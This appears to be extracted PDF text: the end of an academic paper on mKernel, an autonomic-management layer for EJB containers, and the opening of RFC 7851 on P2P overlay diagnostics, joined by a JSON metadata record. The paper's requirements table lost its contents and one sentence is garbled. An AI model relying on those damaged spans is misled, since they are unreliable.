As part of the class-files the component is enhanced with, a Management Context is integrated. This class acts as configuration cache for the corresponding module and its constituting beans. Amongst others, it holds configuration information regarding aspects of the different services of mKernel, e.g. information about interceptors to re-route invocations to and directives for event types to throw as discussed in section 4. Configuration of a module is performed by the corresponding service via addressing the so-called Configuration Accesspoint which is realized as stateless session bean and integrated into each managed module. The context itself only caches this information and does not store it permanently. All information covered can be requested from the corresponding services at any given time.
Next, a so-called Referencer is configured and integrated into the module in process. It is an additional stateless session bean which provides references to session beans of the module. It is used by the Naming service of mKernel for being able to perform connection establishment. Afterwards, the partition of the Deployment Information service covering information about the component is configured appropriately. It is integrated as stateless session bean into the module.
To prohibit the direct injection of references during preparation of a bean instance, all dependency declarations are removed from the bytecode as well as from the DD of the module. Instead of those, an additional interceptor (Interceptor 1 in figure 2) is integrated as first interceptor of the interceptor chain attached to any given bean. This interceptor imitates the dependency injection of the container by contacting the Connector and the Naming service, and injecting wrappers for all removed dependencies, if any. This is performed on intercepting a method call indicating that the usage phase of the lifecycle has started. Regarding the lifecycle of a bean instance in combination with the proceeding prescribed for the container, the target instance still believes that it is in the dependency injection phase and consequently does not make use of references designated for dependency injection. After finishing the establishment of connections, the interceptor forwards the lifecycle call to the target instance. Through this proceeding, there is no difference recognizable for the implementation of the affected beans.
To provide the mKernel-based interceptors with sufficient control over incoming method calls, another interceptor (Interceptor 2) is attached to each bean. This interceptor is inserted as second one in the interceptor chain. As discussed above, the first one also belongs to mKernel, being only responsible for dependency injection. Consequently, no interceptor attached by a developer or deployer can gain access to the original method parameters or, in case the invocation should not be forwarded, even realizes its occurrence. Established connections to interceptors are kept for future use. Consequently, it is easily possible to apply instance-specific interceptors via stateful session beans even for managed stateless session beans.
For tracking of events, a third interceptor is attached to each pre-processed bean (Interceptor 3). It requests directives to follow from the management context and stores the relevant events inside the Event Cache. For distribution of events, the Event Distributor is integrated into each managed module as stateless session bean. It checks the event cache in regular intervals for events to distribute and, if any, sends them as messages through a JMS-based Event Topic. At this topic interested event consumers can register for being informed about events. This is not covered in figure 2. The three dots following Interceptor 3 in figure 2 stand for the interceptors attached by developers or deployers. The call is transmitted to them afterwards.
During all of the processing steps, the image of the module is adjusted accordingly. It is afterwards translated into a corresponding DD and integrated into the target module. After completion of the previous steps, all preparations of the target module are finished. Finally, the resulting module is packed into a JAR which is 100 % compliant to the EJB standard. The integration of enhancements is transparent to the application logic of the beans inside and outside the module, i.e. their runtime behavior is not affected.
### 6. EVALUATION
This section addresses two aspects. Firstly, mKernel is evaluated against the requirements stated in section 2. Secondly, the results of a performance analysis are discussed.
With mKernel the functionality required by a managed layer in the context of AC is provided. An evaluation against the requirements stated in section 2 is shown in table 1. The rating in the last column includes the possible values -1, 0 and +1. Here, -1 indicates that the corresponding requirement is not fulfilled by mKernel. A 0 is given in case the requirement is addressed and supported, but there exists a demand on improvement. If the requirement is fulfilled completely a +1 is inserted.
<table>
<thead>
<tr>
<th>Table 1: Functional evaluation of mKernel</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Manageability Requirements (MR)</strong></td>
</tr>
<tr>
<td>ID</td>
</tr>
<tr>
<td>-----------------</td>
</tr>
<tr>
<td>MR-1</td>
</tr>
<tr>
<td>MR-2</td>
</tr>
<tr>
<td>MR-3</td>
</tr>
<tr>
<td>MR-4</td>
</tr>
<tr>
<td>MR-5</td>
</tr>
<tr>
<td>MR-6</td>
</tr>
<tr>
<td>MR-7</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th><strong>Platform Requirements (PR)</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>ID</td>
</tr>
<tr>
<td>-----------------</td>
</tr>
<tr>
<td>PR-1</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th><strong>Development Requirements (DR)</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>ID</td>
</tr>
<tr>
<td>-----------------</td>
</tr>
<tr>
<td>DR-1</td>
</tr>
<tr>
<td>DR-2</td>
</tr>
<tr>
<td>DR-3</td>
</tr>
<tr>
<td>DR-4</td>
</tr>
<tr>
<td>DR-5</td>
</tr>
</tbody>
</table>
As shown in table 1, mKernel fulfills most of the requirements completely. Regarding MR-5, it has to be pointed out that the re-routing of existing connections is covered by the implementation, but no support for state-transfer among connection-targets is included. This was assumed to be application specific and, hence, should be handled outside of mKernel. Identifiers are assigned to modules and bean instances. During interaction context information regarding the control flow is also provided. This allows the tracing of interactions inside a managed container. Moreover, the Deployment Information service delivers rich information about deployed modules of a container. However, the underlying information model covers some shortcomings and should be subject to revision. There is no facility provided by mKernel regarding tracking and provision of historical data, i.e., there is no logging-facility. Altogether, this leads to a rating of 0 for MR-6. It has to be pointed out,
that this aspect does not comprise any unsolved technical aspects. It is solely addressable via processing of data already provided by mKernel. The EJB-standard does not specify the deployment process of components itself including the preparation of data source for persistence, but leaving this open for vendor-specific solutions. Additionally, the design of the naming schema for the JNDI-implementation inside a container is not addressed by the standard. It is not even specified how a name can be assigned to a bean inside a container is not addressed by the standard. It is possible to develop a management layer solely relying on the EJB-standard. For mKernel the demands of the GlassFish container were preserved. In case a migration to different container-implementations should be performed, these aspects must be addressed. Therefore, PR-2 was rated 0.
For evaluating the performance impact of applying mKernel in an EJB-container, there were two sample scenarios used. Each of those was analyzed for stateful and stateless session beans. The first one should show the overhead for using the different facilities of mKernel without any side effects regarding application logic inside the module. Therefore, a simple session bean, providing a single method without any parameters was taken. The method delivers no return value and no application logic is present. The second scenario addresses the interaction with entities, because this is supposed to be the case for most of the EJB-based applications. In this scenario a session bean is used for accessing a database. Therefore, an interface is used, providing methods for creating, reading and deleting a single entity consisting of a String-value. An entity manager is obtained through dependency injection, and the entities are managed via container managed persistency. Together, the scenarios should grant a first insight of how performance is influenced by mKernel for session beans. Each of the scenarios was analyzed through four settings to get an insight into the impact of the different facilities. As reference measurement, the module itself was deployed and executed without extensions and without any part of mKernel being installed in the container (base). The second setting (silent) takes an installation of mKernel without any of its facilities being equipped with directives, meaning that no consumers for events and no interceptors are registered. The two remaining settings address the Event- and the Interceptor service. Within the first one (event), the Event service is instructed to throw events for all business calls. For the second one, an interceptor is registered which internally does not have any application logic, because only the overhead for re-direction is of interest. It intercepts any incoming method call before it is processed by the target bean instance.
As hardware foundation for the evaluation runs, PCs were used, equipped with a 2,4 gigahertz Pentium IV processor with Hyper-Threading, 1 gigabyte random access memory, and a 100 Megabit (MBit) ethernet card. As operating system Windows XP was installed. The runs were performed in a 100-MBit local area network where all hosts were connected to the same switch. As application server GlassFish v2 build 45 was chosen. Of this build the standard installation without any adjustments was taken as foundation. The client side of the scenarios was connected to the application server through the applclient being part of the build. For each scenario a single client application performed a certain number of method invocations upon the target bean. After each single run, for the application server a new installation was prepared. It has to be pointed out that the evaluation performed should by no means be interpreted as benchmarks for the underlying configuration. Especially the application server itself was not subject of any performance analysis. For measuring the overhead caused by the application of mKernel, the percental overhead \( \text{overh}_s \) of each run with mKernel was calculated via setting the arithmetic mean \( \overline{\text{overh}} \) for each scenario \( s \) in relation to the arithmetic mean of the run without mKernel \( \overline{\text{overh}}_{\text{base}} \):
\[
\text{overh}_s = \frac{\overline{\text{overh}}_s}{\overline{\text{overh}}_{\text{base}}} \times 100\%
\]
For the first scenario, the client of the stateless session beans performed 50000 subsequent method invocations. For the stateful session bean case, a connection to a bean instance was established. Afterwards, five subsequent invocations were performed before connecting to a new instance. This was repeated 10000 times, again leading to 50000 observed invocations. For the second scenario, each client established a connection to a session bean for the stateless and stateful case. Afterwards, each type of method – create, read and delete – was invoked once. This was repeated 10000 times, leading to 30000 observations for each setting. Table 2 covers the results of the evaluation. Here, the ‘.’ in the percentage values is used as decimal place.
**Table 2: Performance evaluation of mKernel**
<table>
<thead>
<tr>
<th>No application logic</th>
<th>( s )</th>
<th>( \text{overh}_{\text{Stateless}} )</th>
<th>( \text{overh}_{\text{Stateful}} )</th>
</tr>
</thead>
<tbody>
<tr>
<td>silent</td>
<td>4.343%</td>
<td>1.581%</td>
<td></td>
</tr>
<tr>
<td>event</td>
<td>12.276%</td>
<td>10.801%</td>
<td></td>
</tr>
<tr>
<td>intercept</td>
<td>75.487%</td>
<td>116.546%</td>
<td></td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Database access</th>
<th>( s )</th>
<th>( \text{overh}_{\text{Stateless}} )</th>
<th>( \text{overh}_{\text{Stateful}} )</th>
</tr>
</thead>
<tbody>
<tr>
<td>silent</td>
<td>0.942%</td>
<td>0.408%</td>
<td></td>
</tr>
<tr>
<td>event</td>
<td>4.364%</td>
<td>2.678%</td>
<td></td>
</tr>
<tr>
<td>intercept</td>
<td>30.05%</td>
<td>49.945%</td>
<td></td>
</tr>
</tbody>
</table>
Summarizing, one can state that the overhead for the application of mKernel lies within acceptable boundaries. The results derived for the application of the Interceptor service can be explained by the fact that each invocation on an instance of a session bean is re-directed to a separate session bean instance, i.e. the interceptor. Additionally, for each instance of a session bean, a reference to each interceptor must be obtained on first invocation. This might have led to the results for the intercept-setting in combination with stateful session beans. It has to be pointed out that the different number of subsequent invocations for the two scenarios also had an important influence on the results. For the first scenario, each fifth invocation led to a connection establishment for stateful session beans while this was the case for each third invocation for the second scenario.
7. CONCLUSION AND FUTURE WORK
In summary, the implementation of mKernel showed that the EJB-standard provides a sound foundation for extensions making it manageable autonomously. However, because of the shortcomings found in the standard, it is not
feasible to provide an implementation solely relying on it. Instead, it is necessary to deal with container-specific solutions. All required aspects for manageability are realizable to a high degree. Additionally, the results of the performance evaluation showed that the overhead of integrating manageability into an EJB-container is justifiable. In this context, mKernel provides a domain-specific manageable layer for EA on top of a broadly accepted standard.
However, the evaluation revealed different areas of possible extensions for mKernel. At the time of writing, a comprehensive API is under development. It should replace the need to interact with the facilities directly for management purpose. Currently, the manageability spans those components deployed into the administrated container. It would be desirable to expand manageability with options for manipulating the collection of deployed components itself. At the moment, an additional facility for mKernel based on [11] is realized. Additionally, it is considered in how far application specific configuration of components can be supported during runtime. As first idea, the manipulation of simple environment entries is planned similar to the way dependencies are treated by mKernel already. Finally, it is planned to develop broader sample applications to evaluate and show the potential of mKernel for different application areas.
8. REFERENCES
|
{"Source-Url": "http://eudl.eu/pdf/10.4108/ICST.AUTONOMICS2007.2222", "len_cl100k_base": 11155, "olmocr-version": "0.1.53", "pdf-total-pages": 10, "total-fallback-pages": 0, "total-input-tokens": 32606, "total-output-tokens": 12954, "length": "2e13", "weborganizer": {"__label__adult": 0.0002419948577880859, "__label__art_design": 0.00028586387634277344, "__label__crime_law": 0.00019371509552001953, "__label__education_jobs": 0.0004050731658935547, "__label__entertainment": 4.303455352783203e-05, "__label__fashion_beauty": 0.0001061558723449707, "__label__finance_business": 0.00020647048950195312, "__label__food_dining": 0.00019347667694091797, "__label__games": 0.0003440380096435547, "__label__hardware": 0.000885009765625, "__label__health": 0.0002410411834716797, "__label__history": 0.0001971721649169922, "__label__home_hobbies": 6.157159805297852e-05, "__label__industrial": 0.00030112266540527344, "__label__literature": 0.00014913082122802734, "__label__politics": 0.00017595291137695312, "__label__religion": 0.0003399848937988281, "__label__science_tech": 0.0113677978515625, "__label__social_life": 5.3882598876953125e-05, "__label__software": 0.00684356689453125, "__label__software_dev": 0.9765625, "__label__sports_fitness": 0.00019490718841552737, "__label__transportation": 0.0003886222839355469, "__label__travel": 0.00016582012176513672}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 63064, 0.02807]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 63064, 0.22781]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 63064, 0.91933]], "google_gemma-3-12b-it_contains_pii": [[0, 4958, false], [4958, 12147, null], [12147, 17992, null], [17992, 24884, null], [24884, 32052, null], [32052, 39435, null], [39435, 43888, null], [43888, 50364, null], [50364, 57350, null], [57350, 63064, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4958, true], [4958, 12147, null], [12147, 17992, null], [17992, 24884, null], [24884, 32052, null], [32052, 39435, null], [39435, 43888, null], [43888, 50364, null], [50364, 57350, null], [57350, 63064, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 63064, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 63064, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 63064, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 63064, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 63064, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 63064, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 63064, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 63064, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 63064, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 63064, null]], "pdf_page_numbers": [[0, 4958, 1], [4958, 12147, 2], [12147, 17992, 3], [17992, 24884, 4], [24884, 32052, 5], [32052, 39435, 6], [39435, 43888, 7], [43888, 50364, 8], [50364, 57350, 9], [57350, 63064, 10]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 63064, 0.23377]]}
|
olmocr_science_pdfs
|
2024-12-08
|
2024-12-08
|
3182951c28829a0ac723df908459ad9e8b5345c2
|
Peer-to-Peer (P2P) Overlay Diagnostics
Abstract
This document describes mechanisms for Peer-to-Peer (P2P) overlay diagnostics. It defines extensions to the REsource LOcation And Discovery (RELOAD) base protocol to collect diagnostic information and details the protocol specifications for these extensions. Useful diagnostic information for connection and node status monitoring is also defined. The document also describes the usage scenarios and provides examples of how these methods are used to perform diagnostics.
Status of This Memo
This is an Internet Standards Track document.
This document is a product of the Internet Engineering Task Force (IETF). It represents the consensus of the IETF community. It has received public review and has been approved for publication by the Internet Engineering Steering Group (IESG). Further information on Internet Standards is available in Section 2 of RFC 5741.
Information about the current status of this document, any errata, and how to provide feedback on it may be obtained at http://www.rfc-editor.org/info/rfc7851.
# Table of Contents
1. Introduction .................................................. 4
2. Terminology ................................................... 5
3. Diagnostic Scenarios ........................................... 5
4. Data Collection Mechanisms ................................... 6
4.1. Overview of Operations ................................... 6
4.2. "Ping-like" Behavior: Extending Ping ....................... 8
4.2.1. RELOAD Request Extension: Ping ...................... 9
4.3. "Traceroute-like" Behavior: The PathTrack Method ........ 9
4.3.1. New RELOAD Request: PathTrack ........................ 10
4.4. Error Code Extensions ..................................... 12
5. Diagnostic Data Structures .................................... 13
5.1. DiagnosticsRequest Data Structure ........................ 13
5.2. DiagnosticsResponse Data Structure ....................... 15
5.3. dMFlags and Diagnostic Kind ID Types ..................... 16
6. Message Processing ............................................. 19
6.1. Message Creation and Transmission ....................... 19
6.3. Message Response Creation ................................. 21
6.4. Interpreting Results ...................................... 22
7. Authorization through Overlay Configuration .................. 23
8. Security Considerations ....................................... 23
9. IANA Considerations ........................................... 24
9.1. Diagnostics Flag ........................................ 24
9.2. Diagnostic Kind ID ....................................... 25
9.3. Message Codes ........................................... 26
9.4. Error Code ................................................ 26
9.5. Message Extension ........................................ 26
9.6. XML Name Space Registration ............................... 27
10. References ................................................... 27
10.1. Normative References ..................................... 27
10.2. Informative References ................................... 28
Appendix A. Examples ............................................ 29
A.1. Example 1 ............................................... 29
A.2. Example 2 ............................................... 29
A.3. Example 3 ............................................... 29
Appendix B. Problems with Generating Multiple Responses on Path 29
Acknowledgments .................................................. 30
Authors’ Addresses ................................................ 30
1. Introduction
In the last few years, overlay networks have rapidly evolved and emerged as a promising platform for deployment of new applications and services in the Internet. One of the reasons overlay networks are seen as an excellent platform for large-scale distributed systems is their resilience in the presence of failures. This resilience has three aspects: data replication, routing recovery, and static resilience. Routing recovery algorithms are used to repopulate the routing table with live nodes when failures are detected. Static resilience measures the extent to which an overlay can route around failures even before the recovery algorithm repairs the routing table. Both routing recovery and static resilience rely on accurate and timely detection of failures.
There are a number of situations in which some nodes in a Peer-to-Peer (P2P) overlay may malfunction or behave badly. For example, these nodes may be disabled, congested, or may be misrouting messages. The impact of these malfunctions on the overlay network may be a degradation of quality of service provided collectively by the peers in the overlay network or an interruption of the overlay services. It is desirable to identify malfunctioning or badly behaving peers through diagnostic tools and exclude or reject them from the P2P system. Node failures may also be caused by failures of underlying layers. For example, recovery from an incorrect overlay topology may be slow when the speed at which IP routing recovers after link failures is very slow. Moreover, if a backbone link fails and the failover is slow, the network may be partitioned, leading to partitions of overlay topologies and inconsistent routing results between different partitioned components.
Some keep-alive algorithms based on periodic probe and acknowledge mechanisms enable accurate and timely detection of failures of one node’s neighbors [Overlay-Failure-Detection], but these algorithms by themselves can only detect the disabled neighbors using the periodic method. This may not be sufficient for the service provider operating the overlay network.
A P2P overlay diagnostic framework supporting periodic and on-demand methods for detecting node failures and network failures is desirable. This document describes a general P2P overlay diagnostic extension to the base protocol RELOAD [RFC6940] and is intended as a complement to keep-alive algorithms in the P2P overlay itself. Readers are advised to consult [P2PSIP-CONCEPTS] for further background on the problem domain.
2. Terminology
This document uses the concepts defined in RELOAD [RFC6940]. In addition, the following terms are used in the document:
- **overlay hop**: One overlay hop is one portion of path between the initiator node and the destination peer in a RELOAD overlay. Each time packets are passed to the next node in the RELOAD overlay, one overlay hop occurs.
- **underlay hop**: An underlay hop is one portion of the path between source and destination in the IP layer. Each time packets are passed to the next IP-layer device, an underlay hop occurs.
The key words "MUST", "MUST NOT", "REQUIRED", "SHALL", "SHALL NOT", "SHOULD", "SHOULD NOT", "RECOMMENDED", "MAY", and "OPTIONAL" in this document are to be interpreted as described in [RFC2119].
3. Diagnostic Scenarios
P2P systems are self-organizing, and ideally the setup and configuration of individual P2P nodes requires no network management in the traditional sense. However, users of an overlay as well as P2P service providers may contemplate usage scenarios where some monitoring and diagnostics are required. We present a simple connectivity test and some useful diagnostic information that may be used in such diagnostics.
The common usage scenarios for P2P diagnostics can be broadly categorized in three classes:
- **Automatic diagnostics built into the P2P overlay routing protocol.** Nodes perform periodic checks of known neighbors and remove those nodes from the routing tables that fail to respond to connectivity checks [Handling_Churn_in_a_DHT]. Unresponsive nodes may only be temporarily disabled, for example, due to a local cryptographic processing overload, disk processing overload, or link overload. It is therefore useful to repeat the connectivity checks to see nodes have recovered and can be again placed in the routing tables. This process is known as 'failed node recovery' and can be optimized as described in the paper "Handling Churn in a DHT" [Handling_Churn_in_a_DHT].
b. Diagnostics used by a particular node to follow up on an individual user complaint or failure. For example, a technical support staff member may use a desktop sharing application (with the permission of the user) to remotely determine the health of, and possible problems with, the malfunctioning node. Part of the remote diagnostics may consist of simple connectivity tests with other nodes in the P2P overlay and retrieval of statistics from nodes in the overlay. The simple connectivity tests are not dependent on the type of P2P overlay. Note that other tests may be required as well, including checking the health and performance of the user’s computer or mobile device and checking the bandwidth of the link connecting the user to the Internet.
c. P2P system-wide diagnostics used to check the overall health of the P2P overlay network. These include checking the consumption of network bandwidth, checking for the presence of problem links, and checking for abusive or malicious nodes. This is not a trivial problem and has been studied in detail for content and streaming P2P overlays [Diagnostic_Framework] and has not been addressed in earlier documents. While this is a difficult problem, a great deal of information that can help in diagnosing these problems can be obtained by obtaining basic diagnostic information for peers and the network. This document provides a framework for obtaining this information.
4. Data Collection Mechanisms
4.1. Overview of Operations
The diagnostic mechanisms described in this document are primarily intended to detect and locate failures or monitor performance in P2P overlay networks. It provides mechanisms to detect and locate malfunctioning or badly behaving nodes including disabled nodes, congested nodes, and misrouting peers. It provides a mechanism to detect direct connectivity or connectivity to a specified node, a mechanism to detect the availability of specified resource records, and a mechanism to discover P2P overlay topology and the underlay topology failures.
The RELOAD diagnostics extensions define two mechanisms to collect data. The first is an extension to the RELOAD Ping mechanism that allows diagnostic data to be queried from a node as well as to diagnose the path to that node. The second is a new method, PathTrack, for collecting diagnostic information iteratively. Payloads for these mechanisms allowing diagnostic data to be collected and represented are presented, and additional error codes are introduced. Essentially, this document reuses the RELOAD specification [RFC6940] and extends it to introduce the new
diagnostics methods. The extensions strictly follow how RELOAD specifies message routing, transport, NAT traversal, and other RELOAD protocol features.
This document primarily describes how to detect and locate failures including disabled nodes, congested nodes, misrouting behaviors, and underlying network faults in P2P overlay networks through a simple and efficient mechanism. This mechanism is modeled after the ping/traceroute paradigm: ping [RFC792] is used for connectivity checks, and traceroute is used for hop-by-hop fault localization as well as path tracing. This document specifies a "ping-like" mode (by extending the RELOAD Ping method to gather diagnostics) and a "traceroute-like" mode (by defining the new PathTrack method) for diagnosing P2P overlay networks.
One way these tools can be used is to detect the connectivity to the specified node or the availability of the specified resource record through the extended Ping operation. Once the overlay network receives some alarms about overlay service degradation or interruption, a Ping is sent. If the Ping fails, one can then send a PathTrack to determine where the fault lies.
The diagnostic information can only be provided to authorized nodes. Some diagnostic information can be provided to all the participants in the P2P overlay, and some other diagnostic information can only be provided to the nodes authorized by the local or overlay policy. The authorization depends on the type of the diagnostic information and the administrative considerations and is application specific.
This document considers the general administrative scenario based on diagnostic Kind, where a whole overlay can authorize a certain kind of diagnostic information to a small list of particular nodes (e.g., administrative nodes). That means if a node gets the authorization to access a diagnostic Kind, it can access that information from all nodes in the overlay network. It leaves the scenario where a particular node authorizes its diagnostic information to a particular list of nodes out of scope. This could be achieved by extension of this document if there is a requirement in the near future. The default policy or access rule for a type of diagnostic information is "deny" unless specified in the diagnostics extension document. As the RELOAD protocol already requires that each message carries the message signature of the sender, the receiver of the diagnostics requests can use the signature to identify the sender. It can then use the overlay configuration file with this signature to determine which types of diagnostic information that node is authorized for.
In the remainder of this section we define mechanisms for collecting data, as well as the specific protocol extensions (message extensions, new methods, and error codes) required to collect this information. In Section 5 we discuss the format of the data collected, and in Section 6 we discuss detailed message processing.
It is important to note that the mechanisms described in this document do not guarantee that the information collected is in fact related to the previous failures. However, using the information from previous traversed nodes, the user (or management system) may be able to infer the problem. Symmetric routing can be achieved by using the Via List [RFC6940] (or an alternate DHT routing algorithm), but the response path is not guaranteed to be the same.
4.2. "Ping-like" Behavior: Extending Ping
To provide "ping-like" behavior, the RELOAD Ping method is extended to collect diagnostic data along the path. The request message is forwarded by the intermediate peers along the path and then terminated by the responsible peer. After optional local diagnostics, the responsible peer returns a response message. If an error is found when routing, an error response is sent to the initiator node by the intermediate peer.
The message flow of a Ping message (with diagnostic extensions) is as follows:
```
Peer A Peer B Peer C Peer D
| | | |
(1). PingReq (2). PingReq (3). PingReq (4). PingAns
-----------------> -----------------> ----------------->
| | | |
(5). PingAns (6). PingAns (5). PingAns
<----------------- <----------------- <-----------------
```
Figure 1: Ping Diagnostic Message Flow
4.2.1. RELOAD Request Extension: Ping
To extend the Ping request for use in diagnostics, a new extension of RELOAD is defined. The structure for a MessageExtension in RELOAD is defined as:
```c
struct {
MessageExtensionType type;
Boolean critical;
opaque extension_contents<0..2^32-1>;
} MessageExtension;
```
For the Ping request extension, we define a new MessageExtensionType, extension 0x2 named "Diagnostic_Ping", as specified in Table 4. The extension contents consists of a DiagnosticsRequest structure, defined in Section 5.1. This extension MAY be used for new requests of the Ping method and MUST NOT be included in requests using any other method.
This extension is not critical. If a peer does not support the extension, they will simply ignore the diagnostic portion of the message and will treat the message as if it were a normal ping. Senders MUST accept a response that lacks diagnostic information and SHOULD NOT resend the message expecting a reply. Receivers who receive a method other than Ping including this extension MUST ignore the extension.
4.3. "Traceroute-like" Behavior: The PathTrack Method
We define a simple PathTrack method for retrieving diagnostic information iteratively.
The operation of this request is shown below in Figure 2. The initiator node A asks its neighbor B which is the next hop peer to the destination ID, and B returns a message with the next hop peer C information, along with optional diagnostic information for B to the initiator node. Then the initiator node A asks the next hop peer C (direct response routing [RFC7263] or via symmetric routing) to return next hop peer D information and diagnostic information of C. Unless a failure prevents the message from being forwarded, this step can be repeated until the request reaches responsible peer D for the destination ID and retrieves the diagnostic information of peer D.
The message flow of a PathTrack message (with diagnostic extensions) is as follows:
Peer-A Peer-B Peer-C Peer-D
(1).PathTrackReq
---------------
(2).PathTrackAns
<---------------
(3).PathTrackReq
---------------
(4).PathTrackAns
<---------------
(5).PathTrackReq
---------------
(6).PathTrackAns
<---------------
Figure 2: PathTrack Diagnostic Message Flow
There have been proposals that RouteQuery and a series of Fetch requests can be used to replace the PathTrack mechanism; however, in the presence of high rates of churn, such an operation would not, strictly speaking, provide identical results, as the path may change between RouteQuery and Fetch operations. While obviously the path could change between steps of PathTrack as well, with a single message rather than two messages for query and fetch, less inconsistency is likely, and thus the use of a single message is preferred.
Given that in a typical diagnostic scenario the peer sending the PathTrack request desires to obtain information about the current path to the destination, in the event that successive calls to PathTrack return different paths, the results should be discarded and the request resent, ensuring that the second request traverses the appropriate path.
4.3.1. New RELOAD Request: PathTrack
This document defines a new RELOAD method, PathTrack, to retrieve the diagnostic information from the intermediate peers along the routing path. At each step of the PathTrack request, the responsible peer responds to the initiator node with requested status information. Status information can include a peer’s congestion state, processing power, available bandwidth, the number of entries in its neighbor table, uptime, identity, network address information, and next hop peer information.
A PathTrack request specifies which diagnostic information is requested using a DiagnosticsRequest data structure, which is defined and discussed in detail in Section 5.1. Base information is requested by setting the appropriate flags in the data structure in the request. If all flags are clear (no bits are set), then the PathTrack request is only used for requesting the next hop information. In this case, the iterative mode of PathTrack is degraded to a RouteQuery method that is only used for checking the liveness of the peers along the routing path. The PathTrack request can be routed using direct response routing or other routing methods chosen by the initiator node.
A response to a successful PathTrackReq is a PathTrackAns message. The PathTrackAns contains general diagnostic information in the payload, returned using a DiagnosticResponse data structure. This data structure is defined and discussed in detail in Section 5.2. The information returned is determined based on the information requested in the flags in the corresponding request.
4.3.1.1. PathTrack Request
The structure of the PathTrack request is as follows:
```c
struct{
Destination destination;
DiagnosticsRequest request;
}PathTrackReq;
```
The fields of the PathTrackReq are as follows:
destination: The destination that the initiator node is interested in. This may be any valid destination object, including a NodeID, opaque ids, or ResourceID. One example should be noted that, for debugging purposes, the initiator will use the destination ID as it was used when failure happened.
request: A DiagnosticsRequest, as discussed in Section 5.1.
4.3.1.2. PathTrack Response
The structure of the PathTrack response is as follows:
```c
struct{
Destination next_hop;
DiagnosticsResponse response;
}PathTrackAns;
```
The fields of the PathTrackAns are as follows:
next_hop: The information of the next hop node from the responding intermediate peer to the destination. If the responding peer is the responsible peer for the destination ID, then the next_hop node ID equals the responding node ID, and after receiving a PathTrackAns where the next_hop node ID equals the responding node ID, the initiator MUST stop the iterative process.
response: A DiagnosticsResponse, as discussed in Section 5.2.
4.4. Error Code Extensions
This document extends the error response method defined in the RELOAD specification to support error cases resulting from diagnostic queries. When an error is encountered in RELOAD, the Message Code 0xffff is returned. The ErrorResponse structure includes an error code. We define new error codes to report possible error conditions detected while performing diagnostics:
<table>
<thead>
<tr>
<th>Code Value</th>
<th>Error Code Name</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x15</td>
<td>Error_Underlay_Destination_Unreachable</td>
</tr>
<tr>
<td>0x16</td>
<td>Error_Underlay_Time_Exceeded</td>
</tr>
<tr>
<td>0x17</td>
<td>Error_Message_Expired</td>
</tr>
<tr>
<td>0x18</td>
<td>Error_Upstream_Misrouting</td>
</tr>
<tr>
<td>0x19</td>
<td>Error_Loop_Detected</td>
</tr>
<tr>
<td>0x1a</td>
<td>Error_TTL_Hops_Exceeded</td>
</tr>
</tbody>
</table>
The error code is returned by the upstream node before the failure node. The upstream node uses the normal ping to detect the failure type and return it to the initiator node, which will help the user (initiator node) to understand where the failure happened and what kind of error happened, as the failure may happen at the same location and for the same reason when sending the normal message and the diagnostics message.
As defined in RELOAD, additional information may be stored (in an implementation-specific way) in the optional error_info byte string. While the specifics are obviously left to the implementation, as an example, in the case of 0x15, the error_field could be used to provide additional information as to why the underlay destination is unreachable (net unreachable, host unreachable, fragmentation needed, etc.).
5. Diagnostic Data Structures
Both the extended Ping method and PathTrack method use the following common diagnostics data structures to collect data. Two common structures are defined: DiagnosticsRequest for requesting data and DiagnosticsResponse for returning the information.
5.1. DiagnosticsRequest Data Structure
The DiagnosticsRequest data structure is used to request diagnostic information and has the following form:
```c
enum { (2^16-1) } DiagnosticKindId;
struct{
DiagnosticKindId kind;
opaque diagnostic_extension_contents<0..2^32-1>;
}DiagnosticExtension;
struct{
uint64 expiration;
uint64 timestamp_initiated;
uint64 dMFlags;
uint32 ext_length;
DiagnosticExtension diagnostic_extensions_list<0..2^32-1>;
}DiagnosticsRequest;
```
The fields in the DiagnosticsRequest are as follows:
**expiration:** The time when the request will expire represented as the number of milliseconds elapsed since midnight Jan 1, 1970 UTC (not counting leap seconds). This will have the same values for seconds as standard UNIX time or POSIX time. More information can be found at "Unix time" in Wikipedia [UnixTime]. This value MUST have a value between 1 and 600 seconds in the future. This value is used to prevent replay attacks.
**timestamp_initiated:** The time when the diagnostics request was initiated, represented as the number of milliseconds elapsed since midnight Jan 1, 1970 UTC (not counting leap seconds). This will have the same values for seconds as standard UNIX time or POSIX time.
dMFlags: A mandatory field that is an unsigned 64-bit integer indicating which base diagnostic information the request initiator node is interested in. The initiator sets different bits to retrieve different kinds of diagnostic information. If dMFlags is set to zero, then no base diagnostic information is conveyed in the PathTrack response. If dMFlags is set to all "1"s, then all base diagnostic information values are requested. A request may set any number of the flags to request the corresponding diagnostic information.
Note this memo specifies the initial set of flags; the flags can be extended. The dMflags indicate general diagnostic information. The mapping between the bits in the dMFlags and the diagnostic Kind ID presented is as described in Section 9.1.
